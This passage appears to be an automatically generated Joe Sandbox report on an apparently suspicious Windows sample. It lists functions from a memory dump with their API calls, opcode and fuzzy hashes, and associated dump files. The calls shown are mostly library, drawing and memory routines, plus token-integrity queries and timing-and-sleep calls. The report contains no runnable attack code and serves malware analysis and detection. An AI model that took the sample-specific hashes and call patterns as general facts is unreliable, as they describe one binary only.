                          • Instruction ID: 41105f155676e901e45b90a7001d598dd8633087503a742d50a5472cbd714c34
                          • Opcode Fuzzy Hash: 0c79aa988cd2e32ef1d70c7fc41ca1951bf4107d38fb8c91ab823a3e48dce3c7
                          • Instruction Fuzzy Hash: D90147726412187F372326B66C8CC7B796CDEC2BA0B14412EFD00E3203EA2D8D0283B4
                          Function 00719639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
                          • SelectObject.GDI32(?,00000000), ref: 007196A2
                          • BeginPath.GDI32(?), ref: 007196B9
                          • SelectObject.GDI32(?,00000000), ref: 007196E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: 53a52104ba5152592aefadacdcdde5e6133aa6e9d6caf65e514a15a4fcb58e4e
                          • Instruction ID: 94282ae09931a7b78768852e37ffd2cbcd489fcf31074e99a3accc38a428c884
                          • Opcode Fuzzy Hash: 53a52104ba5152592aefadacdcdde5e6133aa6e9d6caf65e514a15a4fcb58e4e
                          • Instruction Fuzzy Hash: 5E217170802345FBDB119F68EC247E93B74BB00355F508217F550A61F1D37C6896CBA8
                          Function 00765711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: 880777db47845f187e0667c44965e227bac0823fede5291838a2dd94b4a199ae
                          • Instruction ID: 6fc6a374786a4fb0526a81a6145455ec444ca43f382f292fda0fcd4001681ed5
                          • Opcode Fuzzy Hash: 880777db47845f187e0667c44965e227bac0823fede5291838a2dd94b4a199ae
                          • Instruction Fuzzy Hash: 5B01B9A1641615FBD6089520ED42FBB735DAB313A4F404020FD06AA641F76DEE20A2F0
                          Function 00732DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,?,0072F2DE,00733863,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6), ref: 00732DFD
                          • _free.LIBCMT ref: 00732E32
                          • _free.LIBCMT ref: 00732E59
                          • SetLastError.KERNEL32(00000000,00701129), ref: 00732E66
                          • SetLastError.KERNEL32(00000000,00701129), ref: 00732E6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 0238fd9d2b5b45ad2a9cdcaca0960e8c3f835eaf3340e906f28c7d8766590a28
                          • Instruction ID: 3e12cde1ddf6635fcc520cd89c55feeac8a7cf6f2adcf7ef6aa4170ee97c99f0
                          • Opcode Fuzzy Hash: 0238fd9d2b5b45ad2a9cdcaca0960e8c3f835eaf3340e906f28c7d8766590a28
                          • Instruction Fuzzy Hash: 8C012872285600ABFA1327757C4FE2B266DABC17B1F258029F425A22E3EF7C8C035065
                          Function 0076000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                          Download Yara Rule
                          APIs
                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?,?,0076035E), ref: 0076002B
                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760046
                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760054
                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?), ref: 00760064
                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760070
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: f8d967573dbd411d6f2460bf3feb08289718ace8e3e87478a0f0bd7602a2b5cb
                          • Instruction ID: bcb9213488dffaeb946ec3f57ec8785896d1c3ce6e7323cd55144906ea090423
                          • Opcode Fuzzy Hash: f8d967573dbd411d6f2460bf3feb08289718ace8e3e87478a0f0bd7602a2b5cb
                          • Instruction Fuzzy Hash: 2B018B76600204BFDF124F68DC08FAB7AADEB447A2F148125FD06E6210E7B9DD419BA0
                          Function 0076E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?), ref: 0076E997
                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0076E9A5
                          • Sleep.KERNEL32(00000000), ref: 0076E9AD
                          • QueryPerformanceCounter.KERNEL32(?), ref: 0076E9B7
                          • Sleep.KERNEL32 ref: 0076E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 39ea12dd3f14ecf5d53e2e1389725d5c11cb66300b4fd8d80b84afb80cf714ad
                          • Instruction ID: 1b57157041e44960103b6b35420731a5bbd2ec99b151f78b887a4aeb68879735
                          • Opcode Fuzzy Hash: 39ea12dd3f14ecf5d53e2e1389725d5c11cb66300b4fd8d80b84afb80cf714ad
                          • Instruction Fuzzy Hash: A5018C75C0162DDBCF00AFE4DC59AEDBB78FF08700F444546E902B2241DB38A552CBAA
                          Function 007610F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761136
                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 842720411-0
                          • Opcode ID: 851cd19fea3fef4779da23a435afc2c0e0391966b93525844863d52fbaff84cb
                          • Instruction ID: 26c73b8724a671c7e43464384a0efd8558a5d8aa0008ce0d119aefb44f8a4b15
                          • Opcode Fuzzy Hash: 851cd19fea3fef4779da23a435afc2c0e0391966b93525844863d52fbaff84cb
                          • Instruction Fuzzy Hash: A4016DB5100209BFDF164FA8DC4DA6A3B6EEF86360B548416FA41C3360DA35DC018A64
                          Function 00760FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00760FCA
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00760FD6
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00760FE5
                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00760FEC
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00761002
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: 553df3824c214b909a5e443d6513bc0ff05d701074401ba4d6a0fef1620ea6f6
                          • Instruction ID: c0adc4e1f8c7a0f4420694b4bed655de35296beb4520531c28351f7ce224c024
                          • Opcode Fuzzy Hash: 553df3824c214b909a5e443d6513bc0ff05d701074401ba4d6a0fef1620ea6f6
                          • Instruction Fuzzy Hash: 67F0AF75200305ABDF220FA49C4DF563B6DEF89762F508415F906C6260CA38DC418A74
                          Function 00761014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076102A
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00761036
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761045
                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0076104C
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761062
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: fb4b066347a8e166e3a46c7c89ee778b77a530657326a922d70fcf163223c187
                          • Instruction ID: ad2cee25be848d33688eeb3057e964273cc1a8fee30390d096416b350b82f010
                          • Opcode Fuzzy Hash: fb4b066347a8e166e3a46c7c89ee778b77a530657326a922d70fcf163223c187
                          • Instruction Fuzzy Hash: B2F0A975200305ABDF221FA8EC4DF5A3BADEF89761F604416FA06D6260CA38DC418AB4
                          Function 0077030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770324
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770331
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 0077033E
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 0077034B
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770358
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770365
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: ebdbcfe4d45e3ef730c932cc4d436bdbc40e732c8c77cff889d0af54cdca52f7
                          • Instruction ID: dfe2943836f4c49c9d06e1e13d91b4f8dcd448a820f078b4baf8d7ef3e852ade
                          • Opcode Fuzzy Hash: ebdbcfe4d45e3ef730c932cc4d436bdbc40e732c8c77cff889d0af54cdca52f7
                          • Instruction Fuzzy Hash: 2C019C72800B15DFCB30AF66D880812FBF9BE60255315CA3FD1AA52931C3B5A959CE80
                          Function 0073D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 0073D752
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073D764
                          • _free.LIBCMT ref: 0073D776
                          • _free.LIBCMT ref: 0073D788
                          • _free.LIBCMT ref: 0073D79A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 0f7c7b91eac1b67b488af50f17f74034a73cae5cca835e2db8b725a19bf61266
                          • Instruction ID: 1155688938b24818c16f9d41b674860600b52d2229e26b0035fffabe2363cc30
                          • Opcode Fuzzy Hash: 0f7c7b91eac1b67b488af50f17f74034a73cae5cca835e2db8b725a19bf61266
                          • Instruction Fuzzy Hash: F6F01272544214ABA632EB64F9C6D1677DDBB44710F954849F088E7513C73CFC818A68
                          Function 00765C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00765C58
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00765C6F
                          • MessageBeep.USER32(00000000), ref: 00765C87
                          • KillTimer.USER32(?,0000040A), ref: 00765CA3
                          • EndDialog.USER32(?,00000001), ref: 00765CBD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 7598c577eefd8b96c9313260008dd360abb13d19d2fd5d67f67e15f6c1ea7134
                          • Instruction ID: 65a0fdcf200f5befcfcb3ba78dc716bb6acaf75a7604794d8fff3c6f1a3870bf
                          • Opcode Fuzzy Hash: 7598c577eefd8b96c9313260008dd360abb13d19d2fd5d67f67e15f6c1ea7134
                          • Instruction Fuzzy Hash: 1501A470500B05AFEF215B10DD4EFA67BB8BF00B05F00565AB983A14E1DBF8A985DFA4
                          Function 007322A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 007322BE
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 007322D0
                          • _free.LIBCMT ref: 007322E3
                          • _free.LIBCMT ref: 007322F4
                          • _free.LIBCMT ref: 00732305
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 661f96af4e5c3680bd714c86cae71c75b98891c3bf1cbd0f74da9ea614dadc6b
                          • Instruction ID: df48eb3e4f6d6a5878b1cc99f8155f394a8c22140b9c80b32a8cb46bd22c7971
                          • Opcode Fuzzy Hash: 661f96af4e5c3680bd714c86cae71c75b98891c3bf1cbd0f74da9ea614dadc6b
                          • Instruction Fuzzy Hash: 9DF017749021209B9612AF54BC05A093BB4F718760F51954FF454E22B3C73D2813AEEC
                          Function 007195C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • EndPath.GDI32(?), ref: 007195D4
                          • StrokeAndFillPath.GDI32(?,?,007571F7,00000000,?,?,?), ref: 007195F0
                          • SelectObject.GDI32(?,00000000), ref: 00719603
                          • DeleteObject.GDI32 ref: 00719616
                          • StrokePath.GDI32(?), ref: 00719631
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 567492a8684b9e7c1cc928588a0ce04c68fe0aeb942fe05eabbd334f0a6a545a
                          • Instruction ID: f2b7a26cccb8de5f3689981bff270d4ab6e72f28238e469197c8a381ed86f057
                          • Opcode Fuzzy Hash: 567492a8684b9e7c1cc928588a0ce04c68fe0aeb942fe05eabbd334f0a6a545a
                          • Instruction Fuzzy Hash: ABF03C30006248EBDB125F69ED2C7A43B71AB00322F44C216F565550F1D73CA9A3DF38
                          Function 00730F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __freea$_free
                          • String ID: a/p$am/pm
                          • API String ID: 3432400110-3206640213
                          • Opcode ID: fd1a56832aab67a228f0992fac19d62ba7c414536e44f09cc688d1192acc4345
                          • Instruction ID: 2c9fc70d297eff884a9360342e52b0b6c21ea40e8ed4a34fa911c7999a116f2a
                          • Opcode Fuzzy Hash: fd1a56832aab67a228f0992fac19d62ba7c414536e44f09cc688d1192acc4345
                          • Instruction Fuzzy Hash: 17D12871A00206CAFB289F68C895BFEB7B1FF06300FA44159E541AB653D37D9D80CB91
                          Function 007861D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00720242: EnterCriticalSection.KERNEL32(007D070C,007D1884,?,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072024D
                            • Part of subcall function 00720242: LeaveCriticalSection.KERNEL32(007D070C,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072028A
                            • Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9
                          • __Init_thread_footer.LIBCMT ref: 00786238
                            • Part of subcall function 007201F8: EnterCriticalSection.KERNEL32(007D070C,?,?,00718747,007D2514), ref: 00720202
                            • Part of subcall function 007201F8: LeaveCriticalSection.KERNEL32(007D070C,?,00718747,007D2514), ref: 00720235
                            • Part of subcall function 0077359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007735E4
                            • Part of subcall function 0077359C: LoadStringW.USER32(007D2390,?,00000FFF,?), ref: 0077360A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                          • String ID: x#}$x#}$x#}
                          • API String ID: 1072379062-1301169260
                          • Opcode ID: 8f11cd0218400b222fdc41280157bed0c30a7fa7d264e05d903c0f7d399ff00d
                          • Instruction ID: dab5a4c20da58be2e86f1dfb7033c057a768fcbe7ebee37b370dc7db1d345292
                          • Opcode Fuzzy Hash: 8f11cd0218400b222fdc41280157bed0c30a7fa7d264e05d903c0f7d399ff00d
                          • Instruction Fuzzy Hash: 4AC17B71A40105EBDB14EF58C894EBEB7B9FF48310F108069FA45AB291DB78ED55CBA0
                          Function 00738A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00738B6E
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00738B7A
